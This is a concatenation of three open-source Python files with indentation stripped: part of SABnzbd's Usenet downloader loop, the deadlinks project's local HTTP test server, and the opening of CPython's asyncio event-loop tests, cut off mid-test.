# Now let's check if it was stable in the last 10 seconds
can_be_slowed = BPSMeter.get_stable_speed(timespan=10)
can_be_slowed_timer = 0
if not can_be_slowed:
self.sleep_time = 0
logging.debug("Downloader-slowdown: %r", can_be_slowed)
else:
read = []
BPSMeter.reset()
time.sleep(1.0)
with DOWNLOADER_CV:
while (
(sabnzbd.NzbQueue.is_empty() or self.is_paused() or self.paused_for_postproc)
and not self.shutdown
and not self.force_disconnect
and not self.server_restarts
):
DOWNLOADER_CV.wait()
if now > next_bpsmeter_update:
BPSMeter.update()
next_bpsmeter_update = now + _BPSMETER_UPDATE_DELAY
if not read:
continue
for selected in read:
nw = self.read_fds[selected]
article = nw.article
server = nw.server
try:
bytes_received, done, skip = nw.recv_chunk()
except:
bytes_received, done, skip = (0, False, False)
if skip:
continue
if bytes_received < 1:
self.__reset_nw(nw, "server closed connection", wait=False)
continue
else:
try:
article.nzf.nzo.update_download_stats(BPSMeter.bps, server.id, bytes_received)
except AttributeError:
# In case nzf has disappeared because the file was deleted before the update could happen
pass
BPSMeter.update(server.id, bytes_received)
if self.bandwidth_limit:
if BPSMeter.bps + BPSMeter.sum_cached_amount > self.bandwidth_limit:
BPSMeter.update()
while BPSMeter.bps > self.bandwidth_limit:
time.sleep(0.01)
BPSMeter.update()
if nw.status_code != 222 and not done:
if not nw.connected or nw.status_code == 480:
try:
nw.finish_connect(nw.status_code)
if sabnzbd.LOG_ALL:
logging.debug(
"%s@%s last message -> %s", nw.thrdnum, nw.server.host, nntp_to_msg(nw.data)
)
nw.clear_data()
except NNTPPermanentError as error:
# Handle login problems
block = False
penalty = 0
msg = error.response
ecode = int_conv(msg[:3])
display_msg = " [%s]" % msg
logging.debug("Server login problem: %s, %s", ecode, msg)
if ecode in (502, 400, 481, 482) and clues_too_many(msg):
# Too many connections: remove this thread and reduce thread-setting for server
# Plan to go back to the full number after a penalty timeout
if server.active:
errormsg = T("Too many connections to server %s") % display_msg
if server.errormsg != errormsg:
server.errormsg = errormsg
logging.warning(T("Too many connections to server %s"), server.host)
# Don't count this for the tries (max_art_tries) on this server
self.__reset_nw(nw, send_quit=True)
self.plan_server(server, _PENALTY_TOOMANY)
server.threads -= 1
elif ecode in (502, 481, 482) and clues_too_many_ip(msg):
# Account sharing?
if server.active:
errormsg = T("Probable account sharing") + display_msg
if server.errormsg != errormsg:
server.errormsg = errormsg
name = " (%s)" % server.host
logging.warning(T("Probable account sharing") + name)
penalty = _PENALTY_SHARE
block = True
elif ecode in (452, 481, 482, 381) or (ecode == 502 and clues_login(msg)):
# Cannot login, block this server
if server.active:
errormsg = T("Failed login for server %s") % display_msg
if server.errormsg != errormsg:
server.errormsg = errormsg
logging.error(T("Failed login for server %s"), server.host)
penalty = _PENALTY_PERM
block = True
elif ecode in (502, 482):
# Cannot connect (other reasons), block this server
if server.active:
errormsg = T("Cannot connect to server %s [%s]") % ("", display_msg)
if server.errormsg != errormsg:
server.errormsg = errormsg
logging.warning(T("Cannot connect to server %s [%s]"), server.host, msg)
if clues_pay(msg):
penalty = _PENALTY_PERM
else:
penalty = _PENALTY_502
block = True
elif ecode == 400:
# Temp connection problem?
if server.active:
logging.debug("Unspecified error 400 from server %s", server.host)
penalty = _PENALTY_VERYSHORT
block = True
else:
# Unknown error, just keep trying
if server.active:
errormsg = T("Cannot connect to server %s [%s]") % ("", display_msg)
if server.errormsg != errormsg:
server.errormsg = errormsg
logging.warning(T("Cannot connect to server %s [%s]"), server.host, msg)
penalty = _PENALTY_UNKNOWN
block = True
if block or (penalty and server.optional):
retry_article = False
if server.active:
if server.required:
sabnzbd.Scheduler.plan_required_server_resume()
retry_article = True
else:
server.deactivate()
if penalty and (block or server.optional):
self.plan_server(server, penalty)
# Note that the article is discard for this server if the server is not required
self.__reset_nw(nw, retry_article=retry_article, send_quit=True)
continue
except:
logging.error(
T("Connecting %s@%s failed, message=%s"),
nw.thrdnum,
nw.server.host,
nntp_to_msg(nw.data),
)
# No reset-warning needed, above logging is sufficient
self.__reset_nw(nw, retry_article=False)
if nw.connected:
logging.info("Connecting %s@%s finished", nw.thrdnum, nw.server.host)
self.__request_article(nw)
elif nw.status_code == 223:
done = True
logging.debug("Article <%s> is present", article.article)
elif nw.status_code == 211:
logging.debug("group command ok -> %s", nntp_to_msg(nw.data))
nw.group = nw.article.nzf.nzo.group
nw.clear_data()
self.__request_article(nw)
elif nw.status_code in (411, 423, 430):
done = True
logging.debug(
"Thread %s@%s: Article %s missing (error=%s)",
nw.thrdnum,
nw.server.host,
article.article,
nw.status_code,
)
nw.clear_data()
elif nw.status_code == 500:
if article.nzf.nzo.precheck:
# Assume "STAT" command is not supported
server.have_stat = False
logging.debug("Server %s does not support STAT", server.host)
else:
# Assume "BODY" command is not supported
server.have_body = False
logging.debug("Server %s does not support BODY", server.host)
nw.clear_data()
self.__request_article(nw)
if done:
# Successful data, clear "bad" counter
server.bad_cons = 0
server.errormsg = server.warning = ""
if sabnzbd.LOG_ALL:
logging.debug("Thread %s@%s: %s done", nw.thrdnum, server.host, article.article)
self.decode(article, nw.data)
# Reset connection for new activity
nw.soft_reset()
server.busy_threads.remove(nw)
server.idle_threads.append(nw)
self.remove_socket(nw)
def __reset_nw(
self,
nw: NewsWrapper,
reset_msg: Optional[str] = None,
warn: bool = False,
wait: bool = True,
count_article_try: bool = True,
retry_article: bool = True,
send_quit: bool = False,
):
# Some warnings are errors, and not added as server.warning
if warn and reset_msg:
nw.server.warning = reset_msg
logging.info("Thread %s@%s: %s", nw.thrdnum, nw.server.host, reset_msg)
elif reset_msg:
logging.debug("Thread %s@%s: %s", nw.thrdnum, nw.server.host, reset_msg)
# Make sure this NewsWrapper is in the idle threads
if nw in nw.server.busy_threads:
nw.server.busy_threads.remove(nw)
if nw not in nw.server.idle_threads:
nw.server.idle_threads.append(nw)
# Make sure it is not in the readable sockets
self.remove_socket(nw)
if nw.article:
# Only some errors should count towards the total tries for each server
if count_article_try:
nw.article.tries += 1
# Do we discard, or try again for this server
if not retry_article or nw.article.tries > cfg.max_art_tries():
# Too many tries on this server, consider article missing
self.decode(nw.article, None)
nw.article.tries = 0
else:
# Retry again with the same server
logging.debug(
"Re-adding article %s from %s to server %s",
nw.article.article,
nw.article.nzf.filename,
nw.article.fetcher,
)
nw.article.fetcher.article_queue.append(nw.article)
# Reset connection object
nw.hard_reset(wait, send_quit=send_quit)
# Empty SSL info, it might change on next connect
nw.server.ssl_info = ""
def __request_article(self, nw: NewsWrapper):
try:
nzo = nw.article.nzf.nzo
if nw.server.send_group and nzo.group != nw.group:
group = nzo.group
if sabnzbd.LOG_ALL:
logging.debug("Thread %s@%s: GROUP <%s>", nw.thrdnum, nw.server.host, group)
nw.send_group(group)
else:
if sabnzbd.LOG_ALL:
logging.debug("Thread %s@%s: BODY %s", nw.thrdnum, nw.server.host, nw.article.article)
nw.body()
# Mark as ready to be read
self.read_fds[nw.nntp.fileno] = nw
except socket.error as err:
logging.info("Looks like server closed connection: %s", err)
self.__reset_nw(nw, "server broke off connection", warn=True, send_quit=False)
except:
logging.error(T("Suspect error in downloader"))
logging.info("Traceback: ", exc_info=True)
self.__reset_nw(nw, "server broke off connection", warn=True, send_quit=False)
# ------------------------------------------------------------------------------
# Timed restart of servers admin.
# For each server all planned events are kept in a list.
# When the first timer of a server fires, all other existing timers
# are neutralized.
# Each server has a dictionary entry, consisting of a list of timestamps.
@synchronized(TIMER_LOCK)
def plan_server(self, server: Server, interval: int):
"""Plan the restart of a server in 'interval' minutes"""
if cfg.no_penalties() and interval > _PENALTY_SHORT:
# Overwrite in case of no_penalties
interval = _PENALTY_SHORT
logging.debug("Set planned server resume %s in %s mins", server.host, interval)
if server.id not in self.timers:
self.timers[server.id] = []
stamp = time.time() + 60.0 * interval
self.timers[server.id].append(stamp)
if interval:
sabnzbd.Scheduler.plan_server(self.trigger_server, [server.id, stamp], interval)
@synchronized(TIMER_LOCK)
def trigger_server(self, server_id: str, timestamp: float):
"""Called by scheduler, start server if timer still valid"""
logging.debug("Trigger planned server resume for server-id %s", server_id)
if server_id in self.timers:
if timestamp in self.timers[server_id]:
del self.timers[server_id]
self.init_server(server_id, server_id)
@NzbQueueLocker
@synchronized(TIMER_LOCK)
def unblock(self, server_id: str):
# Remove timer
try:
del self.timers[server_id]
except KeyError:
pass
# Activate server if it was inactive
for server in self.servers:
if server.id == server_id and not server.active:
logging.debug("Unblock server %s", server.host)
self.init_server(server_id, server_id)
break
def unblock_all(self):
for server_id in self.timers.keys():
self.unblock(server_id)
@NzbQueueLocker
@synchronized(TIMER_LOCK)
def check_timers(self):
"""Make sure every server without a non-expired timer is active"""
# Clean expired timers
now = time.time()
kicked = []
# Create a copy so we can remove during iteration
for server_id in list(self.timers):
if not [stamp for stamp in self.timers[server_id] if stamp >= now]:
logging.debug("Forcing re-evaluation of server-id %s", server_id)
del self.timers[server_id]
self.init_server(server_id, server_id)
kicked.append(server_id)
# Activate every inactive server without an active timer
for server in self.servers:
if server.id not in self.timers:
if server.id not in kicked and not server.active:
logging.debug("Forcing activation of server %s", server.host)
self.init_server(server.id, server.id)
def update_server(self, oldserver: str, newserver: Optional[str]):
"""Update the server and make sure we trigger
the update in the loop to do housekeeping"""
self.init_server(oldserver, newserver)
self.wakeup()
@NzbQueueLocker
def wakeup(self):
"""Just rattle the semaphore"""
pass
@NzbQueueLocker
def stop(self):
"""Shutdown, wrapped so the semaphore is notified"""
self.shutdown = True
sabnzbd.notifier.send_notification("SABnzbd", T("Shutting down"), "startup")
def clues_login(text: str) -> bool:
"""Check for any "failed login" clues in the response code"""
text = text.lower()
for clue in ("username", "password", "invalid", "authen", "access denied"):
if clue in text:
return True
return False
def clues_too_many(text: str) -> bool:
"""Check for any "too many connections" clues in the response code"""
text = text.lower()
for clue in ("exceed", "connections", "too many", "threads", "limit"):
# Not 'download limit exceeded' error
if (clue in text) and ("download" not in text) and ("byte" not in text):
return True
return False
def clues_too_many_ip(text: str) -> bool:
"""Check for any "account sharing" clues in the response code"""
text = text.lower()
for clue in ("simultaneous ip", "multiple ip"):
if clue in text:
return True
return False
def clues_pay(text: str) -> bool:
"""Check for messages about payments"""
text = text.lower()
for clue in ("credits", "paym", "expired", "exceeded"):
if clue in text:
return True
return False
def check_server_expiration():
"""Check if user should get warning about server date expiration"""
for server in config.get_servers().values():
if server.expire_date():
days_to_expire = ceil(
(time.mktime(time.strptime(server.expire_date(), "%Y-%m-%d")) - time.time()) / (60 * 60 * 24)
)
# Notify from 5 days in advance
if days_to_expire < 6:
logging.warning(T("Server %s is expiring in %s day(s)"), server.displayname(), days_to_expire)
# Reset on the day of expiration
if days_to_expire <= 0:
server.expire_date.set("")
config.save_config()
def check_server_quota():
"""Check quota on servers"""
for srv, server in config.get_servers().items():
if server.quota():
if server.quota.get_int() + server.usage_at_start() < sabnzbd.BPSMeter.grand_total.get(srv, 0):
logging.warning(T("Server %s has used the specified quota"), server.displayname())
server.quota.set("")
config.save_config()
|
simple_server.py
|
# Copyright 2019 Oleg Butuzov. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
deadlinks.main
~~~~~~~~~~~~~~
Main (cli interface)
:copyright: (c) 2019 by Oleg Butuzov.
:license: Apache2, see LICENSE for more details.
"""
# -- Imports -------------------------------------------------------------------
from typing import (Union, Optional)
from functools import partial
try:
from socketserver import ThreadingMixIn
from http.server import HTTPServer
except ModuleNotFoundError:
from SocketServer import ThreadingMixIn # type: ignore
from BaseHTTPServer import HTTPServer # type: ignore
from socket import (socket, SOCK_STREAM, AF_INET)
from threading import Thread
from pathlib import Path
from .handler import Handler
from .router import Router
# -- Implementation ------------------------------------------------------------
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
daemon_threads = True
class SimpleServer:
def __init__(self, web_root: Union[str, Path]) -> None:
""" Starts simple webserver and handles requests to local folder. """
if not isinstance(web_root, Path):
web_root = Path(web_root)
self.router = Router(web_root.resolve())
_socket = socket(AF_INET, type=SOCK_STREAM)
_socket.bind(('localhost', 0))
self._sa = _socket.getsockname()
_socket.close()
self.start()
def start(self) -> None:
# implement correct type annotation, when change
# https://github.com/python/mypy/issues/1484
self._handler = partial(Handler, self.router)
self._server = ThreadedHTTPServer(self._sa, self._handler)
server_thread = Thread(target=self._server.serve_forever, daemon=True)
server_thread.start()
def __str__(self) -> str:
""" Instance as browsable URL. """
return self.url()
def url(self) -> str:
""" Return URL of running server (including path). """
return "http://{}:{}".format(self._sa[0], self._sa[1])
|
test_events.py
|
"""Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
def tearDownModule():
asyncio.set_event_loop_policy(None)
def broken_unix_getsockname():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform.startswith("aix"):
return True
elif sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = loop.create_future()
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = loop.create_future()
self.completed = loop.create_future()
self.disconnects = {fd: loop.create_future() for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
async def coro1():
await asyncio.sleep(0)
async def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
with self.assertWarnsRegex(
RuntimeWarning,
r"coroutine \S+ was never awaited"
):
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
async def cb():
self.loop.stop()
await asyncio.sleep(0.1)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_run_in_executor_cancel(self):
called = False
def patched_call_soon(*args):
nonlocal called
called = True
def run():
time.sleep(0.05)
f2 = self.loop.run_in_executor(None, run)
f2.cancel()
self.loop.close()
self.loop.call_soon = patched_call_soon
self.loop.call_soon_threadsafe = patched_call_soon
time.sleep(0.4)
self.assertFalse(called)
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.create_server(('127.0.0.1', 0), backlog=1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread, timeout=1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = test_utils.simple_server_sslcontext()
